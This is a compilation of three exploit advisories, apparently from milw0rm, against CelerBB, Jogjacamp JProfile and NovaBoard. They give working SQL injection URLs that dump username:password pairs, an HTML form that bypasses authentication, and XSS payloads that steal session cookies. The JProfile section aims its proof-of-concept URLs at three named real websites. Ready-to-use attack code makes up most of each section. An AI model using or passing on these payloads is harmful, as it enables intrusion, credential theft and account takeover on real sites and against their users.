1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: viewforum.php, viewtopic.php
This bug allows a guest to view username and
password list.
- [B] Information Disclosure
Requisites: none
File affected: showme.php
This bug allows a guest to view reserved
information of any user.
- [C] Authentication Bypass
Requisites: magic_quotes_gpc = off
File affected: login.php
This bug allows a guest to bypass authentication.
Code
- [A] Multiple SQL Injection
http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23
http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23
- [B] Information Disclosure
http://www.site.com/path/showme.php?user=admin
- [C] Authentication Bypass
<html>
<head>
<title>CelerBB 0.0.2 Authentication Bypass Exploit</title>
</head>
<body>
<form action="login.php" method="POST">
<input type="hidden" name="Username" value="admin'#">
<input type="submit" value="Exploit">
</form>
</body>
</html>
Fix
No fix.
# milw0rm
Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability
Vendor : http://jogjacamp.com
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p
# milw0rm
NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability
Program: NovaBoard
Version: <= 1.0.1
File affected: index.php
Download: http://www.novaboard.net/
Found by Pepelux
eNYe-Sec - www.enye-sec.org
About the program (by the author's page)
NovaBoard is a free, feature rich community message board software written in
PHP & MySQL that allows you to set up your own forum within minutes.
With a smart modules feature and the ease of creating your own themes you can
style and manipulate your board to look and perform how you want.
NovaBoard makes running a message board a breeze!
Bug
You can inject JS.
Exploit
Persistent XSS:
You can write a message to another user of the forum and inject XSS code:
Message subject:
Message recipient:
Message:
<script>alert(document.cookie)</script>
you can also send the user cookie to another site
Non-persistent XSS:
http://site.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
Response:
If you are an authenticated user you'll see something like this:
PHPSESSID=241092c53c1379df01b743d910f61c62; nova_name=Member;
nova_password=f11d8a080797894ad3e714fa2f849c62
The username and the password hash (nova_password) are stored in the cookie, so a stolen cookie is enough to impersonate the user.
If you are not authenticated:
PHPSESSID=241092c53c1379df01b743d910f61c62
# milw0rm